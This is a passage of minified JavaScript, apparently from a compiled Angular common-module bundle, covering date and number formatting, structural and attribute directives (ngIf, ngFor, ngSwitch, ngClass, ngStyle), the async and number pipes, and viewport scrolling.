ore=/^(\d{4,})-?(\d\d)-?(\d\d)(?:T(\d\d)(?::?(\d\d)(?::?(\d\d)(?:\.(\d+))?)?)?(Z|([+-])(\d\d):?(\d\d))?)?$/,ay={},rre=/((?:[^BEGHLMOSWYZabcdhmswyz']+)|(?:'(?:[^']|'')*')|(?:G{1,5}|y{1,4}|Y{1,4}|M{1,5}|L{1,5}|w{1,2}|W{1}|d{1,2}|E{1,6}|c{1,6}|a{1,5}|b{1,5}|B{1,5}|h{1,2}|H{1,2}|m{1,2}|s{1,2}|S{1,3}|z{1,4}|Z{1,5}|O{1,4}))([\s\S]*)/;var Ns=(()=>((Ns=Ns||{})[Ns.Short=0]="Short",Ns[Ns.ShortGMT=1]="ShortGMT",Ns[Ns.Long=2]="Long",Ns[Ns.Extended=3]="Extended",Ns))(),Ga=(()=>((Ga=Ga||{})[Ga.FullYear=0]="FullYear",Ga[Ga.Month=1]="Month",Ga[Ga.Date=2]="Date",Ga[Ga.Hours=3]="Hours",Ga[Ga.Minutes=4]="Minutes",Ga[Ga.Seconds=5]="Seconds",Ga[Ga.FractionalSeconds=6]="FractionalSeconds",Ga[Ga.Day=7]="Day",Ga))(),Tn=(()=>((Tn=Tn||{})[Tn.DayPeriods=0]="DayPeriods",Tn[Tn.Days=1]="Days",Tn[Tn.Months=2]="Months",Tn[Tn.Eras=3]="Eras",Tn))();function e6(t,a,e,i){let n=function pre(t){if(cP(t))return t;if("number"==typeof t&&!isNaN(t))return new Date(t);if("string"==typeof t){if(t=t.trim(),/^(\d{4}(-\d{1,2}(-\d{1,2})?)?)$/.test(t)){const[n,r=1,c=1]=t.split("-").map(d=>+d);return Gv(n,r-1,c)}const e=parseFloat(t);if(!isNaN(t-e))return new Date(e);let i;if(i=t.match(ore))return function _re(t){const a=new Date(0);let e=0,i=0;const n=t[8]?a.setUTCFullYear:a.setFullYear,r=t[8]?a.setUTCHours:a.setHours;t[9]&&(e=Number(t[9]+t[10]),i=Number(t[9]+t[11])),n.call(a,Number(t[1]),Number(t[2])-1,Number(t[3]));const c=Number(t[4]||0)-e,d=Number(t[5]||0)-i,T=Number(t[6]||0),k=Math.floor(1e3*parseFloat("0."+(t[7]||0)));return r.call(a,c,d,T,k),a}(i)}const a=new Date(t);if(!cP(a))throw new Error(`Unable to convert "${t}" into a date`);return a}(t);a=xh(e,a)||a;let d,c=[];for(;a;){if(d=rre.exec(a),!d){c.push(a);break}{c=c.concat(d.slice(1));const q=c.pop();if(!q)break;a=q}}let T=n.getTimezoneOffset();i&&(T=sP(i,T),n=function fre(t,a,e){const i=e?-1:1,n=t.getTimezoneOffset();return function hre(t,a){return(t=new Date(t.getTime())).setMinutes(t.getMinutes()+a),t}(t,i*(sP(a,n)-n))}(n,i,!0));let k="";return c.forEach(q=>{const Y=function ure(t){if(a6[t])return a6[t];let a;switch(t){case"G":case"GG":case"GGG":a=pr(Tn.Eras,Zn.Abbreviated);break;case"GGGG":a=pr(Tn.Eras,Zn.Wide);break;case"GGGGG":a=pr(Tn.Eras,Zn.Narrow);break;case"y":a=Cs(Ga.FullYear,1,0,!1,!0);break;case"yy":a=Cs(Ga.FullYear,2,0,!0,!0);break;case"yyy":a=Cs(Ga.FullYear,3,0,!1,!0);break;case"yyyy":a=Cs(Ga.FullYear,4,0,!1,!0);break;case"Y":a=Kv(1);break;case"YY":a=Kv(2,!0);break;case"YYY":a=Kv(3);break;case"YYYY":a=Kv(4);break;case"M":case"L":a=Cs(Ga.Month,1,1);break;case"MM":case"LL":a=Cs(Ga.Month,2,1);break;case"MMM":a=pr(Tn.Months,Zn.Abbreviated);break;case"MMMM":a=pr(Tn.Months,Zn.Wide);break;case"MMMMM":a=pr(Tn.Months,Zn.Narrow);break;case"LLL":a=pr(Tn.Months,Zn.Abbreviated,Zr.Standalone);break;case"LLLL":a=pr(Tn.Months,Zn.Wide,Zr.Standalone);break;case"LLLLL":a=pr(Tn.Months,Zn.Narrow,Zr.Standalone);break;case"w":a=t6(1);break;case"ww":a=t6(2);break;case"W":a=t6(1,!0);break;case"d":a=Cs(Ga.Date,1);break;case"dd":a=Cs(Ga.Date,2);break;case"c":case"cc":a=Cs(Ga.Day,1);break;case"ccc":a=pr(Tn.Days,Zn.Abbreviated,Zr.Standalone);break;case"cccc":a=pr(Tn.Days,Zn.Wide,Zr.Standalone);break;case"ccccc":a=pr(Tn.Days,Zn.Narrow,Zr.Standalone);break;case"cccccc":a=pr(Tn.Days,Zn.Short,Zr.Standalone);break;case"E":case"EE":case"EEE":a=pr(Tn.Days,Zn.Abbreviated);break;case"EEEE":a=pr(Tn.Days,Zn.Wide);break;case"EEEEE":a=pr(Tn.Days,Zn.Narrow);break;case"EEEEEE":a=pr(Tn.Days,Zn.Short);break;case"a":case"aa":case"aaa":a=pr(Tn.DayPeriods,Zn.Abbreviated);break;case"aaaa":a=pr(Tn.DayPeriods,Zn.Wide);break;case"aaaaa":a=pr(Tn.DayPeriods,Zn.Narrow);break;case"b":case"bb":case"bbb":a=pr(Tn.DayPeriods,Zn.Abbreviated,Zr.Standalone,!0);break;case"bbbb":a=pr(Tn.DayPeriods,Zn.Wide,Zr.Standalone,!0);break;case"bbbbb":a=pr(Tn.DayPeriods,Zn.Narrow,Zr.Standalone,!0);break;case"B":case"BB":case"BBB":a=pr(Tn.DayPeriods,Zn.Abbreviated,Zr.Format,!0);break;case"BBBB":a=pr(Tn.DayPeriods,Zn.Wide,Zr.Format,!0);break;case"BBBBB":a=pr(Tn.DayPeriods,Zn.Narrow,Zr.Format,!0);break;case"h":a=Cs(Ga.Hours,1,-12);break;case"hh":a=Cs(Ga.Hours,2,-12);break;case"H":a=Cs(Ga.Hours,1);break;case"HH":a=Cs(Ga.Hours,2);break;case"m":a=Cs(Ga.Minutes,1);break;case"mm":a=Cs(Ga.Minutes,2);break;case"s":a=Cs(Ga.Seconds,1);break;case"ss":a=Cs(Ga.Seconds,2);break;case"S":a=Cs(Ga.FractionalSeconds,1);break;case"SS":a=Cs(Ga.FractionalSeconds,2);break;case"SSS":a=Cs(Ga.FractionalSeconds,3);break;case"Z":case"ZZ":case"ZZZ":a=Qv(Ns.Short);break;case"ZZZZZ":a=Qv(Ns.Extended);break;case"O":case"OO":case"OOO":case"z":case"zz":case"zzz":a=Qv(Ns.ShortGMT);break;case"OOOO":case"ZZZZ":case"zzzz":a=Qv(Ns.Long);break;default:return null}return a6[t]=a,a}(q);k+=Y?Y(n,e,T):"''"===q?"'":q.replace(/(^'|'$)/g,"").replace(/''/g,"'")}),k}function Gv(t,a,e){const i=new Date(0);return i.setFullYear(t,a,e),i.setHours(0,0,0),i}function xh(t,a){const e=function Qoe(t){return Xc(t)[Ji.LocaleId]}(t);if(ay[e]=ay[e]||{},ay[e][a])return ay[e][a];let i="";switch(a){case"shortDate":i=Hv(t,Pr.Short);break;case"mediumDate":i=Hv(t,Pr.Medium);break;case"longDate":i=Hv(t,Pr.Long);break;case"fullDate":i=Hv(t,Pr.Full);break;case"shortTime":i=Uv(t,Pr.Short);break;case"mediumTime":i=Uv(t,Pr.Medium);break;case"longTime":i=Uv(t,Pr.Long);break;case"fullTime":i=Uv(t,Pr.Full);break;case"short":const n=xh(t,"shortTime"),r=xh(t,"shortDate");i=jv(qv(t,Pr.Short),[n,r]);break;case"medium":const c=xh(t,"mediumTime"),d=xh(t,"mediumDate");i=jv(qv(t,Pr.Medium),[c,d]);break;case"long":const T=xh(t,"longTime"),k=xh(t,"longDate");i=jv(qv(t,Pr.Long),[T,k]);break;case"full":const q=xh(t,"fullTime"),Y=xh(t,"fullDate");i=jv(qv(t,Pr.Full),[q,Y])}return i&&(ay[e][a]=i),i}function jv(t,a){return a&&(t=t.replace(/\{([^}]+)}/g,function(e,i){return null!=a&&i in a?a[i]:e})),t}function um(t,a,e="-",i,n){let r="";(t<0||n&&t<=0)&&(n?t=1-t:(t=-t,r=e));let c=String(t);for(;c.length<a;)c="0"+c;return i&&(c=c.slice(c.length-a)),r+c}function Cs(t,a,e=0,i=!1,n=!1){return function(r,c){let d=function cre(t,a){switch(t){case Ga.FullYear:return a.getFullYear();case Ga.Month:return a.getMonth();case Ga.Date:return a.getDate();case Ga.Hours:return a.getHours();case Ga.Minutes:return a.getMinutes();case Ga.Seconds:return a.getSeconds();case Ga.FractionalSeconds:return a.getMilliseconds();case Ga.Day:return a.getDay();default:throw new Error(`Unknown DateType value "${t}".`)}}(t,r);if((e>0||d>-e)&&(d+=e),t===Ga.Hours)0===d&&-12===e&&(d=12);else if(t===Ga.FractionalSeconds)return function sre(t,a){return um(t,3).substring(0,a)}(d,a);const T=bd(c,Ba.MinusSign);return um(d,a,T,i,n)}}function pr(t,a,e=Zr.Format,i=!1){return function(n,r){return function lre(t,a,e,i,n,r){switch(e){case Tn.Months:return function Xoe(t,a,e){const i=Xc(t),r=Md([i[Ji.MonthsFormat],i[Ji.MonthsStandalone]],a);return Md(r,e)}(a,n,i)[t.getMonth()];case Tn.Days:return function Koe(t,a,e){const i=Xc(t),r=Md([i[Ji.DaysFormat],i[Ji.DaysStandalone]],a);return Md(r,e)}(a,n,i)[t.getDay()];case Tn.DayPeriods:const c=t.getHours(),d=t.getMinutes();if(r){const k=function ere(t){const a=Xc(t);return oP(a),(a[Ji.ExtraData][2]||[]).map(i=>"string"==typeof i?ZD(i):[ZD(i[0]),ZD(i[1])])}(a),q=function tre(t,a,e){const i=Xc(t);oP(i);const r=Md([i[Ji.ExtraData][0],i[Ji.ExtraData][1]],a)||[];return Md(r,e)||[]}(a,n,i),Y=k.findIndex(te=>{if(Array.isArray(te)){const[pe,Re]=te,Fe=c>=pe.hours&&d>=pe.minutes,Ne=c<Re.hours||c===Re.hours&&d<Re.minutes;if(pe.hours<Re.hours){if(Fe&&Ne)return!0}else if(Fe||Ne)return!0}else if(te.hours===c&&te.minutes===d)return!0;return!1});if(-1!==Y)return q[Y]}return function $oe(t,a,e){const i=Xc(t),r=Md([i[Ji.DayPeriodsFormat],i[Ji.DayPeriodsStandalone]],a);return Md(r,e)}(a,n,i)[c<12?0:1];case Tn.Eras:return function Yoe(t,a){return Md(Xc(t)[Ji.Eras],a)}(a,i)[t.getFullYear()<=0?0:1];default:throw new Error(`unexpected translation type ${e}`)}}(n,r,t,a,e,i)}}function Qv(t){return function(a,e,i){const n=-1*i,r=bd(e,Ba.MinusSign),c=n>0?Math.floor(n/60):Math.ceil(n/60);switch(t){case Ns.Short:return(n>=0?"+":"")+um(c,2,r)+um(Math.abs(n%60),2,r);case Ns.ShortGMT:return"GMT"+(n>=0?"+":"")+um(c,1,r);case Ns.Long:return"GMT"+(n>=0?"+":"")+um(c,2,r)+":"+um(Math.abs(n%60),2,r);case Ns.Extended:return 0===i?"Z":(n>=0?"+":"")+um(c,2,r)+":"+um(Math.abs(n%60),2,r);default:throw new Error(`Unknown zone width "${t}"`)}}}function rP(t){return Gv(t.getFullYear(),t.getMonth(),t.getDate()+(4-t.getDay()))}function t6(t,a=!1){return function(e,i){let n;if(a){const r=new Date(e.getFullYear(),e.getMonth(),1).getDay()-1,c=e.getDate();n=1+Math.floor((c+r)/7)}else{const r=rP(e),c=function mre(t){const a=Gv(t,0,1).getDay();return Gv(t,0,1+(a<=4?4:11)-a)}(r.getFullYear()),d=r.getTime()-c.getTime();n=1+Math.round(d/6048e5)}return um(n,t,bd(i,Ba.MinusSign))}}function Kv(t,a=!1){return function(e,i){return um(rP(e).getFullYear(),t,bd(i,Ba.MinusSign),a)}}const a6={};function sP(t,a){t=t.replace(/:/g,"");const e=Date.parse("Jan 01, 1970 00:00:00 "+t)/6e4;return isNaN(e)?a:e}function cP(t){return t instanceof Date&&!isNaN(t.valueOf())}const gre=/^(\d+)?\.((\d+)(-(\d+))?)?$/;function s6(t){const a=parseInt(t);if(isNaN(a))throw new Error("Invalid integer literal when parsing "+t);return a}function uP(t,a){a=encodeURIComponent(a);for(const e of t.split(";")){const i=e.indexOf("="),[n,r]=-1==i?[e,""]:[e.slice(0,i),e.slice(i+1)];if(n.trim()===a)return decodeURIComponent(r)}return null}let ig=(()=>{class t{constructor(e,i,n,r){this._iterableDiffers=e,this._keyValueDiffers=i,this._ngEl=n,this._renderer=r,this._iterableDiffer=null,this._keyValueDiffer=null,this._initialClasses=[],this._rawClass=null}set klass(e){this._removeClasses(this._initialClasses),this._initialClasses="string"==typeof e?e.split(/\s+/):[],this._applyClasses(this._initialClasses),this._applyClasses(this._rawClass)}set ngClass(e){this._removeClasses(this._rawClass),this._applyClasses(this._initialClasses),this._iterableDiffer=null,this._keyValueDiffer=null,this._rawClass="string"==typeof e?e.split(/\s+/):e,this._rawClass&&(HC(this._rawClass)?this._iterableDiffer=this._iterableDiffers.find(this._rawClass).create():this._keyValueDiffer=this._keyValueDiffers.find(this._rawClass).create())}ngDoCheck(){if(this._iterableDiffer){const e=this._iterableDiffer.diff(this._rawClass);e&&this._applyIterableChanges(e)}else if(this._keyValueDiffer){const e=this._keyValueDiffer.diff(this._rawClass);e&&this._applyKeyValueChanges(e)}}_applyKeyValueChanges(e){e.forEachAddedItem(i=>this._toggleClass(i.key,i.currentValue)),e.forEachChangedItem(i=>this._toggleClass(i.key,i.currentValue)),e.forEachRemovedItem(i=>{i.previousValue&&this._toggleClass(i.key,!1)})}_applyIterableChanges(e){e.forEachAddedItem(i=>{if("string"!=typeof i.item)throw new Error(`NgClass can only toggle CSS classes expressed as strings, got ${Wo(i.item)}`);this._toggleClass(i.item,!0)}),e.forEachRemovedItem(i=>this._toggleClass(i.item,!1))}_applyClasses(e){e&&(Array.isArray(e)||e instanceof Set?e.forEach(i=>this._toggleClass(i,!0)):Object.keys(e).forEach(i=>this._toggleClass(i,!!e[i])))}_removeClasses(e){e&&(Array.isArray(e)||e instanceof Set?e.forEach(i=>this._toggleClass(i,!1)):Object.keys(e).forEach(i=>this._toggleClass(i,!1)))}_toggleClass(e,i){(e=e.trim())&&e.split(/\s+/g).forEach(n=>{i?this._renderer.addClass(this._ngEl.nativeElement,n):this._renderer.removeClass(this._ngEl.nativeElement,n)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(yd),Ee(f1),Ee(mi),Ee(wr))},t.\u0275dir=Ot({type:t,selectors:[["","ngClass",""]],inputs:{klass:["class","klass"],ngClass:"ngClass"},standalone:!0}),t})(),hP=(()=>{class t{constructor(e){this._viewContainerRef=e,this.ngComponentOutlet=null}ngOnChanges(e){const{_viewContainerRef:i,ngComponentOutletNgModule:n,ngComponentOutletNgModuleFactory:r}=this;if(i.clear(),this._componentRef=void 0,this.ngComponentOutlet){const c=this.ngComponentOutletInjector||i.parentInjector;(e.ngComponentOutletNgModule||e.ngComponentOutletNgModuleFactory)&&(this._moduleRef&&this._moduleRef.destroy(),this._moduleRef=n?function ene(t,a){return new Nk(t,null!=a?a:null)}(n,fP(c)):r?r.create(fP(c)):void 0),this._componentRef=i.createComponent(this.ngComponentOutlet,{index:i.length,injector:c,ngModuleRef:this._moduleRef,projectableNodes:this.ngComponentOutletContent})}}ngOnDestroy(){this._moduleRef&&this._moduleRef.destroy()}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo))},t.\u0275dir=Ot({type:t,selectors:[["","ngComponentOutlet",""]],inputs:{ngComponentOutlet:"ngComponentOutlet",ngComponentOutletInjector:"ngComponentOutletInjector",ngComponentOutletContent:"ngComponentOutletContent",ngComponentOutletNgModule:"ngComponentOutletNgModule",ngComponentOutletNgModuleFactory:"ngComponentOutletNgModuleFactory"},standalone:!0,features:[sa]}),t})();function fP(t){return t.get(Z_).injector}class Ire{constructor(a,e,i,n){this.$implicit=a,this.ngForOf=e,this.index=i,this.count=n}get first(){return 0===this.index}get last(){return this.index===this.count-1}get even(){return this.index%2==0}get odd(){return!this.even}}let Zi=(()=>{class t{constructor(e,i,n){this._viewContainer=e,this._template=i,this._differs=n,this._ngForOf=null,this._ngForOfDirty=!0,this._differ=null}set ngForOf(e){this._ngForOf=e,this._ngForOfDirty=!0}set ngForTrackBy(e){this._trackByFn=e}get ngForTrackBy(){return this._trackByFn}set ngForTemplate(e){e&&(this._template=e)}ngDoCheck(){if(this._ngForOfDirty){this._ngForOfDirty=!1;const e=this._ngForOf;!this._differ&&e&&(this._differ=this._differs.find(e).create(this.ngForTrackBy))}if(this._differ){const e=this._differ.diff(this._ngForOf);e&&this._applyChanges(e)}}_applyChanges(e){const i=this._viewContainer;e.forEachOperation((n,r,c)=>{if(null==n.previousIndex)i.createEmbeddedView(this._template,new Ire(n.item,this._ngForOf,-1,-1),null===c?void 0:c);else if(null==c)i.remove(null===r?void 0:r);else if(null!==r){const d=i.get(r);i.move(d,c),_P(d,n)}});for(let n=0,r=i.length;n<r;n++){const d=i.get(n).context;d.index=n,d.count=r,d.ngForOf=this._ngForOf}e.forEachIdentityChange(n=>{_P(i.get(n.currentIndex),n)})}static ngTemplateContextGuard(e,i){return!0}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(ho),Ee(yd))},t.\u0275dir=Ot({type:t,selectors:[["","ngFor","","ngForOf",""]],inputs:{ngForOf:"ngForOf",ngForTrackBy:"ngForTrackBy",ngForTemplate:"ngForTemplate"},standalone:!0}),t})();function _P(t,a){t.context.$implicit=a.item}let Ri=(()=>{class t{constructor(e,i){this._viewContainer=e,this._context=new Sre,this._thenTemplateRef=null,this._elseTemplateRef=null,this._thenViewRef=null,this._elseViewRef=null,this._thenTemplateRef=i}set ngIf(e){this._context.$implicit=this._context.ngIf=e,this._updateView()}set ngIfThen(e){gP("ngIfThen",e),this._thenTemplateRef=e,this._thenViewRef=null,this._updateView()}set ngIfElse(e){gP("ngIfElse",e),this._elseTemplateRef=e,this._elseViewRef=null,this._updateView()}_updateView(){this._context.$implicit?this._thenViewRef||(this._viewContainer.clear(),this._elseViewRef=null,this._thenTemplateRef&&(this._thenViewRef=this._viewContainer.createEmbeddedView(this._thenTemplateRef,this._context))):this._elseViewRef||(this._viewContainer.clear(),this._thenViewRef=null,this._elseTemplateRef&&(this._elseViewRef=this._viewContainer.createEmbeddedView(this._elseTemplateRef,this._context)))}static ngTemplateContextGuard(e,i){return!0}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","ngIf",""]],inputs:{ngIf:"ngIf",ngIfThen:"ngIfThen",ngIfElse:"ngIfElse"},standalone:!0}),t})();class Sre{constructor(){this.$implicit=null,this.ngIf=null}}function gP(t,a){if(a&&!a.createEmbeddedView)throw new Error(`${t} must be a TemplateRef, but received '${Wo(a)}'.`)}class l6{constructor(a,e){this._viewContainerRef=a,this._templateRef=e,this._created=!1}create(){this._created=!0,this._viewContainerRef.createEmbeddedView(this._templateRef)}destroy(){this._created=!1,this._viewContainerRef.clear()}enforceState(a){a&&!this._created?this.create():!a&&this._created&&this.destroy()}}let Jf=(()=>{class t{constructor(){this._defaultUsed=!1,this._caseCount=0,this._lastCaseCheckIndex=0,this._lastCasesMatched=!1}set ngSwitch(e){this._ngSwitch=e,0===this._caseCount&&this._updateDefaultCases(!0)}_addCase(){return this._caseCount++}_addDefault(e){this._defaultViews||(this._defaultViews=[]),this._defaultViews.push(e)}_matchCase(e){const i=e==this._ngSwitch;return this._lastCasesMatched=this._lastCasesMatched||i,this._lastCaseCheckIndex++,this._lastCaseCheckIndex===this._caseCount&&(this._updateDefaultCases(!this._lastCasesMatched),this._lastCaseCheckIndex=0,this._lastCasesMatched=!1),i}_updateDefaultCases(e){if(this._defaultViews&&e!==this._defaultUsed){this._defaultUsed=e;for(let i=0;i<this._defaultViews.length;i++)this._defaultViews[i].enforceState(e)}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","ngSwitch",""]],inputs:{ngSwitch:"ngSwitch"},standalone:!0}),t})(),p1=(()=>{class t{constructor(e,i,n){this.ngSwitch=n,n._addCase(),this._view=new l6(e,i)}ngDoCheck(){this._view.enforceState(this.ngSwitch._matchCase(this.ngSwitchCase))}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(ho),Ee(Jf,9))},t.\u0275dir=Ot({type:t,selectors:[["","ngSwitchCase",""]],inputs:{ngSwitchCase:"ngSwitchCase"},standalone:!0}),t})(),d6=(()=>{class t{constructor(e,i,n){n._addDefault(new l6(e,i))}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(ho),Ee(Jf,9))},t.\u0275dir=Ot({type:t,selectors:[["","ngSwitchDefault",""]],standalone:!0}),t})(),Yv=(()=>{class t{constructor(e,i,n){this._ngEl=e,this._differs=i,this._renderer=n,this._ngStyle=null,this._differ=null}set ngStyle(e){this._ngStyle=e,!this._differ&&e&&(this._differ=this._differs.find(e).create())}ngDoCheck(){if(this._differ){const e=this._differ.diff(this._ngStyle);e&&this._applyChanges(e)}}_setStyle(e,i){const[n,r]=e.split("."),c=-1===n.indexOf("-")?void 0:vl.DashCase;null!=i?this._renderer.setStyle(this._ngEl.nativeElement,n,r?`${i}${r}`:i,c):this._renderer.removeStyle(this._ngEl.nativeElement,n,c)}_applyChanges(e){e.forEachRemovedItem(i=>this._setStyle(i.key,null)),e.forEachAddedItem(i=>this._setStyle(i.key,i.currentValue)),e.forEachChangedItem(i=>this._setStyle(i.key,i.currentValue))}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(f1),Ee(wr))},t.\u0275dir=Ot({type:t,selectors:[["","ngStyle",""]],inputs:{ngStyle:"ngStyle"},standalone:!0}),t})(),_1=(()=>{class t{constructor(e){this._viewContainerRef=e,this._viewRef=null,this.ngTemplateOutletContext=null,this.ngTemplateOutlet=null,this.ngTemplateOutletInjector=null}ngOnChanges(e){if(e.ngTemplateOutlet||e.ngTemplateOutletInjector){const i=this._viewContainerRef;if(this._viewRef&&i.remove(i.indexOf(this._viewRef)),this.ngTemplateOutlet){const{ngTemplateOutlet:n,ngTemplateOutletContext:r,ngTemplateOutletInjector:c}=this;this._viewRef=i.createEmbeddedView(n,r,c?{injector:c}:void 0)}else this._viewRef=null}else this._viewRef&&e.ngTemplateOutletContext&&this.ngTemplateOutletContext&&(this._viewRef.context=this.ngTemplateOutletContext)}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo))},t.\u0275dir=Ot({type:t,selectors:[["","ngTemplateOutlet",""]],inputs:{ngTemplateOutletContext:"ngTemplateOutletContext",ngTemplateOutlet:"ngTemplateOutlet",ngTemplateOutletInjector:"ngTemplateOutletInjector"},standalone:!0,features:[sa]}),t})();function hm(t,a){return new gi(2100,!1)}class Pre{createSubscription(a,e){return a.subscribe({next:e,error:i=>{throw i}})}dispose(a){a.unsubscribe()}}class Ore{createSubscription(a,e){return a.then(e,i=>{throw i})}dispose(a){}}const Nre=new Ore,Lre=new Pre;let Jv=(()=>{class t{constructor(e){this._latestValue=null,this._subscription=null,this._obj=null,this._strategy=null,this._ref=e}ngOnDestroy(){this._subscription&&this._dispose(),this._ref=null}transform(e){return this._obj?e!==this._obj?(this._dispose(),this.transform(e)):this._latestValue:(e&&this._subscribe(e),this._latestValue)}_subscribe(e){this._obj=e,this._strategy=this._selectStrategy(e),this._subscription=this._strategy.createSubscription(e,i=>this._updateLatestValue(e,i))}_selectStrategy(e){if(qC(e))return Nre;if(bS(e))return Lre;throw hm()}_dispose(){this._strategy.dispose(this._subscription),this._latestValue=null,this._subscription=null,this._obj=null}_updateLatestValue(e,i){e===this._obj&&(this._latestValue=i,this._ref.markForCheck())}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma,16))},t.\u0275pipe=Fr({name:"async",type:t,pure:!1,standalone:!0}),t})(),bP=(()=>{class t{constructor(e){this._locale=e}transform(e,i,n){if(!function m6(t){return!(null==t||""===t||t!=t)}(e))return null;n=n||this._locale;try{return function Are(t,a,e){return function o6(t,a,e,i,n,r,c=!1){let d="",T=!1;if(isFinite(t)){let k=function Ere(t){let i,n,r,c,d,a=Math.abs(t)+"",e=0;for((n=a.indexOf("."))>-1&&(a=a.replace(".","")),(r=a.search(/e/i))>0?(n<0&&(n=r),n+=+a.slice(r+1),a=a.substring(0,r)):n<0&&(n=a.length),r=0;"0"===a.charAt(r);r++);if(r===(d=a.length))i=[0],n=1;else{for(d--;"0"===a.charAt(d);)d--;for(n-=r,i=[],c=0;r<=d;r++,c++)i[c]=Number(a.charAt(r))}return n>22&&(i=i.splice(0,21),e=n-1,n=1),{digits:i,exponent:e,integerLen:n}}(t);c&&(k=function Tre(t){if(0===t.digits[0])return t;const a=t.digits.length-t.integerLen;return t.exponent?t.exponent+=2:(0===a?t.digits.push(0,0):1===a&&t.digits.push(0),t.integerLen+=2),t}(k));let q=a.minInt,Y=a.minFrac,te=a.maxFrac;if(r){const ut=r.match(gre);if(null===ut)throw new Error(`${r} is not a valid digit info`);const Ze=ut[1],yt=ut[3],It=ut[5];null!=Ze&&(q=s6(Ze)),null!=yt&&(Y=s6(yt)),null!=It?te=s6(It):null!=yt&&Y>te&&(te=Y)}!function Dre(t,a,e){if(a>e)throw new Error(`The minimum number of digits after fraction (${a}) is higher than the maximum (${e}).`);let i=t.digits,n=i.length-t.integerLen;const r=Math.min(Math.max(a,n),e);let c=r+t.integerLen,d=i[c];if(c>0){i.splice(Math.max(t.integerLen,c));for(let Y=c;Y<i.length;Y++)i[Y]=0}else{n=Math.max(0,n),t.integerLen=1,i.length=Math.max(1,c=r+1),i[0]=0;for(let Y=1;Y<c;Y++)i[Y]=0}if(d>=5)if(c-1<0){for(let Y=0;Y>c;Y--)i.unshift(0),t.integerLen++;i.unshift(1),t.integerLen++}else i[c-1]++;for(;n<Math.max(0,r);n++)i.push(0);let T=0!==r;const k=a+t.integerLen,q=i.reduceRight(function(Y,te,pe,Re){return Re[pe]=(te+=Y)<10?te:te-10,T&&(0===Re[pe]&&pe>=k?Re.pop():T=!1),te>=10?1:0},0);q&&(i.unshift(q),t.integerLen++)}(k,Y,te);let pe=k.digits,Re=k.integerLen;const Fe=k.exponent;let Ne=[];for(T=pe.every(ut=>!ut);Re<q;Re++)pe.unshift(0);for(;Re<0;Re++)pe.unshift(0);Re>0?Ne=pe.splice(Re,pe.length):(Ne=pe,pe=[0]);const et=[];for(pe.length>=a.lgSize&&et.unshift(pe.splice(-a.lgSize,pe.length).join(""));pe.length>a.gSize;)et.unshift(pe.splice(-a.gSize,pe.length).join(""));pe.length&&et.unshift(pe.join("")),d=et.join(bd(e,i)),Ne.length&&(d+=bd(e,n)+Ne.join("")),Fe&&(d+=bd(e,Ba.Exponential)+"+"+Fe)}else d=bd(e,Ba.Infinity);return d=t<0&&!T?a.negPre+d+a.negSuf:a.posPre+d+a.posSuf,d}(t,function r6(t,a="-"){const e={minInt:1,minFrac:0,maxFrac:0,posPre:"",posSuf:"",negPre:"",negSuf:"",gSize:0,lgSize:0},i=t.split(";"),n=i[0],r=i[1],c=-1!==n.indexOf(".")?n.split("."):[n.substring(0,n.lastIndexOf("0")+1),n.substring(n.lastIndexOf("0")+1)],d=c[0],T=c[1]||"";e.posPre=d.substring(0,d.indexOf("#"));for(let q=0;q<T.length;q++){const Y=T.charAt(q);"0"===Y?e.minFrac=e.maxFrac=q+1:"#"===Y?e.maxFrac=q+1:e.posSuf+=Y}const k=d.split(",");if(e.gSize=k[1]?k[1].length:0,e.lgSize=k[2]||k[1]?(k[2]||k[1]).length:0,r){const q=n.length-e.posPre.length-e.posSuf.length,Y=r.indexOf("#");e.negPre=r.substring(0,Y).replace(/'/g,""),e.negSuf=r.slice(Y+q).replace(/'/g,"")}else e.negPre=a+e.posPre,e.negSuf=e.posSuf;return e}(function JD(t,a){return Xc(t)[Ji.NumberFormats][a]}(a,Al.Decimal),bd(a,Ba.MinusSign)),a,Ba.Group,Ba.Decimal,e)}(function u6(t){if("string"==typeof t&&!isNaN(Number(t)-parseFloat(t)))return Number(t);if("number"!=typeof t)throw new Error(`${t} is not a number`);return t}(e),n,i)}catch(r){throw hm()}}}return t.\u0275fac=function(e){return new(e||t)(Ee(dm,16))},t.\u0275pipe=Fr({name:"number",type:t,pure:!0,standalone:!0}),t})();let rn=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const MP="browser";function ag(t){return t===MP}function Zv(t){return"server"===t}let tse=(()=>{class t{}return t.\u0275prov=hi({token:t,providedIn:"root",factory:()=>new ise(At(ga),window)}),t})();class ise{constructor(a,e){this.document=a,this.window=e,this.offset=()=>[0,0]}setOffset(a){this.offset=Array.isArray(a)?()=>a:a}getScrollPosition(){return this.supportsScrolling()?[this.window.pageXOffset,this.window.pageYOffset]:[0,0]}scrollToPosition(a){this.supportsScrolling()&&this.window.scrollTo(a[0],a[1])}scrollToAnchor(a){if(!this.supportsScrolling())return;const e=function ase(t,a){const e=t.getElementById(a)||t.getElementsByName(a)[0];if(e)return e;if("function"==typeof t.createTreeWalker&&t.body&&(t.body.createShadowRoot||t.body.attachShadow)){const i=t.createTreeWalker(t.body,NodeFilter.SHOW_ELEMENT);let n=i.currentNode;for(;n;){const r=n.shadowRoot;if(r){const c=r.getElementById(a)||r.querySelector(`[name="${a}"]`);if(c)return c}n=i.nextNode()}}return null}(this.document,a);e&&(this.scrollToElement(e),e.focus())}setHistoryScrollRestoration(a){if(this.supportScrollRestoration()){const e=this.window.history;e&&e.scrollRestoration&&(e.scrollRestoration=a)}}scrollToElement(a){const e=a.getBoundingClientRect(),i=e.left+this.window.pageXOffset,n=e.top+this.window.pageYOffset,r=this.offset();this.window.scrollTo(i-r[0],n-r[1])}supportScrollRestoration(){try{if(!this.supportsScrolling())return!1;const 